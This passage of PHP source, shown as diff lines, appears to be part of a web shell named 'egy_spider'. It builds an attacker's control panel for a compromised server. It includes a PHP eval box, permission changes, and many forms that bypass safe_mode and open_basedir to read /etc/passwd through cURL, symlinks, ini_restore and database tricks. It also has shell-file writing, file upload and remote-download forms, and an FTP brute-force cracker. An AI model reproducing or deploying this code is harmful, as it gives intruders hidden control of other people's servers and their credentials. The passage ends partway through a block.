"<option value=mod>CHMOD</option>";} +if(@function_exists('chown')){$select .= "<option value=own>CHOWN</option>";} +if(@function_exists('chgrp')){$select .= "<option value=grp>CHGRP</option>";} +if($unix && $select){ +echo $fs.$table_up1.div_title($lang[$language.'_text67'],'id6').$table_up2.div('id6').$ts; +echo @sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','param1',55,(($_POST['param1'])?($_POST['param1']):($_SERVER["SCRIPT_FILENAME"]))).ws(2)."<b>".$lang[$language.'_text68'].$arrow."</b>"."<select name=what>".$select."</select>".ws(4).in('text','param2 title="'.$lang[$language.'_text71'].'"',10,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo $te.'</div>'.$table_end1.$fe; +} + +if(!$safe_mode){ +$aliases2 = ''; +foreach ($aliases as $alias_name=>$alias_cmd) + { + $aliases2 .= "<option>$alias_name</option>"; + } +echo $fs.$table_up1.div_title($lang[$language.'_text7'],'id5555').$table_up2.div('id5555').$ts; +echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo $te.'</div>'.$table_end1.$fe; +} + +echo $fs.$table_up1.div_title($lang[$language.'_text54'],'id50').$table_up2.div('id50').$ts; +echo sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12'])); +echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;$tempdir )"); +echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir)); +echo $te.'</div>'.$table_end1.$fe; + +if(!$safe_mode && $unix){ +echo $fs.$table_up1.div_title($lang[$language.'_text76'],'id9').$table_up2.div('id9').$ts; +echo sr(15,"<b>".$lang[$language.'_text72'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12'])); +echo sr(15,"<b>".$lang[$language.'_text73'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;$tempdir )"); +echo sr(15,"<b>".$lang[$language.'_text74'].$arrow."</b>",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir)); +echo $te.'</div>'.$table_end1.$fe; +} + +echo $fs.$table_up1.div_title($lang[$language.'_text32'],'id800').$table_up2.$font; +echo "<div align=center>".div('id800')."<textarea name=php_eval cols=100 rows=10>"; +echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("//unlink(\"egy_spider.php\");\r\n//readfile(\"/etc/passwd\");\r\n//file_get_content(\"/etc/passwd\");")); +echo "</textarea>"; +echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval'); +echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']); +echo "</div></div></font>"; +echo $table_end1.$fe; + +echo $fs.$table_up1.div_title($lang[$language.'_text200'],'id520').$table_up2.div('id520').$ts; +echo sr(15,"<b>".$lang[$language.'_text202'].$arrow."</b>",in('text','snn',85,'/etc/passwd').in('hidden','cmd',0,'copy').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7'])); +echo $te.'</div>'.$table_end1.$fe; +echo $fs.$table_up1.div_title($lang[$language.'_text300'],'id500').$table_up2.div('id500').$ts; +echo sr(15,"<b>".$lang[$language.'_text202'].$arrow."</b>",in('text','SnIpEr_SA',85,'/etc/passwd').in('hidden','cmd',0,'cURL').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7'])); +echo $te.'</div>'.$table_end1.$fe; +echo $fs.$table_up1.div_title($lang[$language.'_text203'],'id510').$table_up2.div('id510').$ts; +echo sr(15,"<b>".$lang[$language.'_text202'].$arrow."</b>",in('text','ini_restore',85,'/etc/passwd').in('hidden','cmd',0,'ini_restore').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7'])); +echo $te.'</div>'.$table_end1.$fe; +echo $fs.$table_up1.div_title($lang[$language.'_text224'],'id800').$table_up2.div('id800').$ts; +echo sr(15,"<b>".$lang[$language.'_text202'].$arrow."</b>","<select size=\"1\" name=\"plugin\"><option value=\"plugin\">/etc/passwd</option></option></select>".in('hidden','cmd',0,'plugin').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7'])); +echo $te.'</div>'.$table_end1.$fe; +echo $fs.$table_up1.div_title($lang[$language.'_text220'],'id900').$table_up2.div('id900').$ts; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','sym1p2',50,(!empty($_POST['sym1p2'])?($_POST['sym1p']):("/../../../"))).in('text','sym1p',50,(!empty($_POST['sym1p'])?($_POST['sym1p']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'sym1').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +echo $fs.$table_up1.div_title($lang[$language.'_text222'],'id980').$table_up2.div('id980').$ts; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('hidden','dir',0,$dir).in('hidden','cmd',0,'sym2').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; + +{ +echo $fs.$table_up1.div_title($lang[$language.'_text204'],'id23').$table_up2.div('id23').$ts; +echo sr(15,"<b>".$lang[$language.'_text205'].$arrow."</b>",in('text','log',96,(!empty($_POST['log'])?($_POST['log']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'Paralyzing been planted and you can usefilename.php?ss=http://shell.txt?').ws(4).in('submit','submit',0,$lang[$language.'_butt65'])); +echo $te.'</div>'.$table_end1.$fe; +echo $fs.$table_up1.div_title($lang[$language.'_text207'],'id801').$table_up2.div('id801').$ts; +echo sr(15,"<b>".$lang[$language.'_text206'].$arrow."</b>",in('text','glob',85,'/etc/').in('hidden','cmd',0,'glob').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7'])); +echo $te.'</div>'.$table_end1.$fe; +echo $fs.$table_up1.div_title($lang[$language.'_text209'],'id5505').$table_up2.div('id5505').$ts; +echo sr(15,"<b>".$lang[$language.'_text206'].$arrow."</b>",in('text','root',85,'/etc/').in('hidden','cmd',0,'root').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7'])); +echo $te.'</div>'.$table_end1.$fe; +echo $fs.$table_up1.div_title($lang[$language.'_text34'],'id11').$table_up2.div('id11').$ts; +echo "<table class=table1 width=100% align=center>"; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} + + + +echo $fs.$table_up1.div_title($lang[$language.'_text151'],'id1221').$table_up2.div('id1221').$ts; +echo "<table class=table1 width=100% align=center>"; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test_5_2_6',85,(!empty($_POST['test_5_2_6'])?($_POST['test_5_2_6']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test_5_2_6').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; + +echo $fs.$table_up1.div_title($lang[$language.'_text161'],'id12211').$table_up2.div('id12211').$ts; +echo "<table class=table1 width=100% align=center>"; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_5_2_6',85,(!empty($_POST['test2_5_2_6'])?($_POST['test2_5_2_6']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2_5_2_6').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; + + + + + +echo $fs.$table_up1.div_title($lang[$language.'_text162'],'id9820').$table_up2.div('id9820').$ts; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('hidden','dir',0,$dir).in('hidden','cmd',0,'test_5_2_4').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; + + +echo $fs.$table_up1.div_title($lang[$language.'_text163'],'id9820').$table_up2.div('id9820').$ts; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('hidden','dir',0,$dir).in('hidden','cmd',0,'egy_perl').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; + + +{ +echo $fs.$table_up1.div_title($lang[$language.'_text33'],'id12').$table_up2.div('id12').$ts; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} + + + + +{ +echo $fs.$table_up1.div_title($lang[$language.'_text144'],'id40').$table_up2.div('id40').$ts; +echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test19_md',15,(!empty($_POST['test19_md'])?($_POST['test19_md']):("mysqli"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test19_ml',15,(!empty($_POST['test19_ml'])?($_POST['test19_ml']):("root"))).ws(4)."<b>".$lang[$language.'_text39'].$arrow."</b>".in('text','test19_mp',15,(!empty($_POST['test19_mp'])?($_POST['test19_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test19_port',15,(!empty($_POST['test19_port'])?($_POST['test19_port']):("3306")))); +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test19_file',96,(!empty($_POST['test19_file'])?($_POST['test19_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test19').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} + +{ +echo $fs.$table_up1.div_title($lang[$language.'_text85'],'id14').$table_up2.div('id14').$ts; +echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433")))); +echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} + + +{ +echo $fs.$table_up1.div_title($lang[$language.'_text112'],'id15').$table_up2.div('id15').$ts; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test5_file',96,(!empty($_POST['test5_file'])?($_POST['test5_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test5').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} + +{ +echo $fs.$table_up1.div_title($lang[$language.'_text113'],'id13').$table_up2.div('id13').$ts; +echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test6_file',96,(!empty($_POST['test6_file'])?($_POST['test6_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test6').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} + +{ +echo $fs.$table_up1.div_title($lang[$language.'_text114'],'id21').$table_up2.div('id21').$ts; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test7_file',96,(!empty($_POST['test7_file'])?($_POST['test7_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test7').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} + + +{ +echo $fs.$table_up1.div_title($lang[$language.'_text170'],'id2221').$table_up2.div('id2221').$ts; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','egy_4_2_0',96,(!empty($_POST['egy_4_2_0'])?($_POST['egy_4_2_0']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'egy_4_2_0').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} + + + +{ +echo $fs.$table_up1.div_title($lang[$language.'_text115'],'id22').$table_up2.div('id22').$ts; +echo sr(15,"<b>".$lang[$language.'_text116'].$arrow."</b>",in('text','test8_file1',96,(!empty($_POST['test8_file1'])?($_POST['test8_file1']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test8')); +echo sr(15,"<b>".$lang[$language.'_text117'].ws(2).$lang[$language.'_text60'].$arrow."</b>",in('text','test8_file2',96,(!empty($_POST['test8_file2'])?($_POST['test8_file2']):($dir))).ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} + +{ +echo $fs.$table_up1.div_title($lang[$language.'_text120'],'id23').$table_up2.div('id23').$ts; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test9_file',96,(!empty($_POST['test9_file'])?($_POST['test9_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test9').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} + +{ +echo $fs.$table_up1.div_title($lang[$language.'_text121'],'id24').$table_up2.div('id24').$ts; +echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test10_file',96,(!empty($_POST['test10_file'])?($_POST['test10_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test10').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} + +{ +echo $fs.$table_up1.div_title($lang[$language.'_text122'],'id19').$table_up2.div('id19').$ts; +echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',96,(!empty($_POST['test_global'])?($_POST['test_global']):($dir))).in('hidden','cmd',0,'safe_dir').in('hidden','glob',0,'glob').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} + +{ +$select_n_rlph = "<select name='n_rlph'><option value=1>[ 1 ] (<<0,01 sec)</option><option value=2>[ 2 ] (<0,01 sec)</option>". +"<option value=3 selected>[ 3 ] (<1 sec (default))</option>". +"<option value=4>[ 4 ] (<10 sec)</option><option value=5>[ 5 ] (>100 sec (danger))</option><option value=6>[ 6 ] (>>100 sec (danger))</option></select>"; +echo $fs.$table_up1.div_title($lang[$language.'_text145'],'id41').$table_up2.div('id41').$ts; +echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',30,(!empty($_POST['dir_rlph'])?($_POST['dir_rlph']):($dir))).ws(2).'<b>'.$lang[$language.'_text55'].'</b>'.ws(2).in('text','end_rlph',6,(!empty($_POST['end_rlph'])?($_POST['end_rlph']):('.php'))).ws(2).in('hidden','cmd',0,'safe_dir').ws(2).'<b>'.$lang[$language.'_text146'].'</b>'.ws(2).$select_n_rlph.ws(2).in('hidden','realpath',0,'realpath').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} + +{ +echo $fs.$table_up1.div_title($lang[$language.'_text130'],'id25').$table_up2.div('id25').$ts; +echo sr(15,"<b>".$lang[$language.'_text116'].$arrow."</b>",in('text','test11_file',96,(!empty($_POST['test11_file'])?($_POST['test11_file']):($tempdir.'test.zip'))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test11').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} + +{ +echo $fs.$table_up1.div_title($lang[$language.'_text123'],'id26').$table_up2.div('id26').$ts; +echo sr(15,"<b>".$lang[$language.'_text116'].$arrow."</b>",in('text','test12_file',96,(!empty($_POST['test12_file'])?($_POST['test12_file']):($tempdir.'test.bzip'))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test12').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} + +{ +echo $fs.$table_up1.div_title($lang[$language.'_text124'],'id27').$table_up3.div('id27').$ts; +echo sr(15,"<b>".$lang[$language.'_text65']." ".$lang[$language.'_text59'].$arrow."</b>",in('text','test13_file2',96,(!empty($_POST['test13_file2'])?($_POST['test13_file2']):($dir."shell.php"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test13')); +echo sr(15,"<b>".$lang[$language.'_text125'].$arrow."</b>",in('text','test13_file1',96,(!empty($_POST['test13_file1'])?($_POST['test13_file1']):("<? phpinfo(); ?>"))).ws(4).in('submit','submit',0,$lang[$language.'_butt10'])); +echo $te.'</div>'.$table_end1.$fe; +} + +{ +echo $fs.$table_up1.div_title($lang[$language.'_text126'],'id28').$table_up2.div('id28').$ts; +echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test14_file2',96,(!empty($_POST['test14_file2'])?($_POST['test14_file2']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test14')); +echo sr(15,"<b>".$lang[$language.'_text125'].$arrow."</b>",in('text','test14_file1',96,(!empty($_POST['test14_file1'])?($_POST['test14_file1']):("<? phpinfo(); ?>"))).ws(4).in('submit','submit',0,$lang[$language.'_butt10'])); +echo $te.'</div>'.$table_end1.$fe; +} + +{ +echo $fs.$table_up1.div_title($lang[$language.'_text133'],'id39').$table_up2.div('id39').$ts; +echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test18_file2',96,(!empty($_POST['test18_file2'])?($_POST['test18_file2']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test18')); +echo sr(15,"<b>".$lang[$language.'_text125'].$arrow."</b>",in('text','test18_file1',96,(!empty($_POST['test18_file1'])?($_POST['test18_file1']):("<? phpinfo(); ?>"))).ws(4).in('submit','submit',0,$lang[$language.'_butt10'])); +echo $te.'</div>'.$table_end1.$fe; +} + +{ +echo $fs.$table_up1.div_title($lang[$language.'_text127'],'id29').$table_up2.div('id29').$ts; +echo sr(15,"<b>".$lang[$language.'_text65']." ".$lang[$language.'_text59'].$arrow."</b>",in('text','test15_file2',96,(!empty($_POST['test15_file2'])?($_POST['test15_file2']):($dir."shell.php"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test15')); +echo sr(15,"<b>".$lang[$language.'_text125'].$arrow."</b>",in('text','test15_file1',96,(!empty($_POST['test15_file1'])?($_POST['test15_file1']):("<? phpinfo(); ?>"))).ws(4).in('submit','submit',0,$lang[$language.'_butt10'])); +echo $te.'</div>'.$table_end1.$fe; +} + +{ +echo $fs.$table_up1.div_title($lang[$language.'_text129'],'id16').$table_up2.div('id16').$ts; +echo sr(15,"<b>".$lang[$language.'_text65']." ".$lang[$language.'_text59'].$arrow."</b>",in('text','test16_file',96,(!empty($_POST['test16_file'])?($_POST['test16_file']):($dir."test.php"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test16').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; +} + +{ +echo $table_up1.div_title($lang[$language.'_text131'],'id17').$table_up2.div('id17').$ts; +echo "<tr><td valign=top width=70%>".$ts; +echo sr(20,"<b>".$lang[$language.'_text30'].$arrow."</b>",$fs.in('text','test17_file',60,(!empty($_POST['test17_file'])?($_POST['test17_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_1').in('submit','submit',0,$lang[$language.'_text136']).$fe); +echo $te."</td><td valign=top width=30%>".$ts; +echo sr(0,"",$fs.in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_2').in('submit','submit',0,$lang[$language.'_butt8']).$fe); +echo $te."</td></tr>"; +echo $te.'</div>'.$table_end1; +} + +{ +echo $table_up1.div_title($lang[$language.'_text132'],'id18').$table_up2.div('id18').$ts; +echo "<tr><td valign=top width=70%>".$ts; +echo sr(20,"<b>".$lang[$language.'_text4'].$arrow."</b>",$fs.in('text','test17_file',60,(!empty($_POST['test17_file'])?($_POST['test17_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_1').in('submit','submit',0,$lang[$language.'_text136']).$fe); +echo $te."</td><td valign=top width=30%>".$ts; +echo sr(0,"",$fs.in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_3').in('submit','submit',0,$lang[$language.'_butt8']).$fe); +echo $te."</td></tr>"; +echo $te.'</div>'.$table_end1; +} + +echo $fs.$table_up1.div_title($lang[$language.'_text171'],'id98200').$table_up2.div('id98200').$ts; +echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('hidden','dir',0,$dir).in('hidden','cmd',0,'egy_5_2_3').ws(4).in('submit','submit',0,$lang[$language.'_butt8'])); +echo $te.'</div>'.$table_end1.$fe; + + +{ +echo "<form name=upload method=POST ENCTYPE=multipart/form-data>"; +echo $table_up1.div_title($lang[$language.'_text5'],'id30').$table_up2.div('id30').$ts; +echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile0',85,'')); +echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2'])); +echo $te.'</div>'.$table_end1.$fe; +} + + +{ +echo "<form name=upload method=POST ENCTYPE=multipart/form-data>"; +echo $table_up1.div_title('Multy '.$lang[$language.'_text5'],'id34').$table_up2.div('id34').$ts; +echo "<tr><td valign=top width=50%>".$ts; +echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile1',35,'')); +echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile2',35,'')); +echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile3',35,'')); +echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile4',35,'')); +echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile5',35,'')); +echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile6',35,'')); +echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile7',35,'')); +echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile8',35,'')); +echo $te."</td><td valign=top width=50%>".$ts; +echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile9',35,'')); +echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile10',35,'')); +echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile11',35,'')); +echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile12',35,'')); +echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile13',35,'')); +echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile14',35,'')); +echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile15',35,'')); +echo sr(15,'',in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2'])); +echo $te."</td></tr>"; +echo $te.'</div>'.$table_end1.$fe; +} + + +{ + echo $fs.$table_up1.div_title($lang[$language.'_text15'],'id31').$table_up2.div('id31').$ts; + echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>",$select_downloaders.in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','rem_file',78,'http://')); + echo sr(15,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',105,$dir.'/download.file').ws(4).in('submit','submit',0,$lang[$language.'_butt2'])); + echo $te.'</div>'.$table_end1.$fe; +} + +echo $fs.$table_up1.div_title($lang[$language.'_text86'],'id32').$table_up2.div('id32').$ts; +echo sr(15,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','d_name',85,$dir).in('hidden','cmd',0,'download_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt14'])); +$arh = $lang[$language.'_text92']; +if(@function_exists('gzcompress')) { $arh .= in('radio','compress',0,'zip').' zip'; } +if(@function_exists('gzencode')) { $arh .= in('radio','compress',0,'gzip').' gzip'; } +if(@function_exists('bzcompress')) { $arh .= in('radio','compress',0,'bzip').' bzip'; } +echo sr(15,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none',1).' '.$arh); +echo $te.'</div>'.$table_end1.$fe; + +{ +echo $table_up1.div_title($lang[$language.'_text93'],'id33').$table_up2.div('id33').$ts."<tr>".$fs."<td valign=top width=33%>".$ts; + +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text94']."</div></b></font>"; +echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',20,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))).in('hidden','cmd',0,'ftp_brute').in('hidden','dir',0,$dir)); +echo sr(25,"",in('radio','brute_method',0,'passwd',1)."<font face=Verdana size=-2>".$lang[$language.'_text99']." ( <a href='".$_SERVER['PHP_SELF']."?users'>".$lang[$language.'_text95']."</a> )</font>"); +echo sr(25,"",in('checkbox','reverse id=reverse',0,'1',1).$lang[$language.'_text101']); +echo sr(25,"",in('radio','brute_method',0,'dic',0).$lang[$language.'_text135']); +echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',0,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("root")))); +echo sr(25,"<b>".$lang[$language.'_text135'].$arrow."</b>",in('text','dictionary',0,(!empty($_POST['dictionary'])?($_POST['dictionary']):($dir.'passw.dic')))); +echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt1'])); + +echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text87']."</div></b></font>"; +echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',20,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21")))); +echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',20,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous")))); +echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',20,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("egy_spider@hotmail.com")))); +echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',20,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_down')); +echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',20,$dir)); +echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option value=FTP_BINARY>FTP_BINARY</option><option value=FTP_ASCII>FTP_ASCII</option></select>".in('hidden','dir',0,$dir)); +echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt14'])); + +echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text100']."</div></b></font>"; +echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',20,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21")))); +echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',20,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous")))); +echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',20,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("egy_spider@hotmail.com")))); +echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',20,$dir)); +echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',20,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_up')); +echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option value=FTP_BINARY>FTP_BINARY</option><option value=FTP_ASCII>FTP_ASCII</option></select>".in('hidden','dir',0,$dir)); +echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt2'])); + +echo $te."</td>".$fe."</tr></div></table>"; +} + + +{ 